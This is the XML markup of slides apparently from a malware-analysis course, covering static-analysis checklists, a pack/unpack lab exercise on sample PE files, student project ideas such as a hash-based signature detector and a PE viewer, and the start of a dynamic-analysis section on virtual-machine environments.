              </a:rPr>
              <a:t>Check it on Virustotal: match any existing antivirus signatures?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>When was it compiled? </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Packed or obfuscated?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Imports</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Strings</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Host-based indicators &amp; </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Network-based indicators</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-134280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-134280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-134280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-180720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5976360" y="4293000"/>
            <a:ext cx="1079640" cy="1944000"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="4a7dba"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7053120" y="4942080"/>
            <a:ext cx="1992600" cy="91404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Guess the purpose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of the PE file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Practice 2 [Pack &amp; Unpack]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr lvl="1" marL="457200" indent="-456840">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>PE File</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: Lab01-02.exe; Lab01-03.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-190080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="457200" indent="-456840">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="743040" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Check it on VirusTotal.com: match or not?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="743040" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Compare the Strings differences before/after unpacking?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="743040" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Check Imports?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="743040" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Host-based indicators?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="743040" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Network-based indicators?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-190080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>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Project idea</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="73000"/>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Write a piece of code to detect and display </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>strings of a PE file.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="002060"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Write a simple signature-based malware </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>detector</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="002060"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Signatures: md5, sha-1, sha-256</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="002060"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Write a simple PEView program</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="002060"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/previous-versions/ms809762(v=msdn.10)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="002060"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/quangngoc430/PeFile-View</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Write a piece of code to construct a block </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>chain</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="002060"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Write a simple program for Surface </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266"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Environment</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VMWare</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VirtualBox</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Parallels</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Virtual PC</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QEMU</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="267" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3060000" y="1966680"/>
            <a:ext cx="5256360" cy="4086000"/>
            <a:chOff x="3060000" y="1966680"/>
            <a:chExt cx="5256360" cy="4086000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="268" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3060000" y="2335680"/>
              <a:ext cx="5256360" cy="3456000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25560">
              <a:solidFill>
                <a:srgbClr val="395e89"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="269" name="CustomShape 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3420000" y="2623680"/>
              <a:ext cx="1367640" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>App.</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
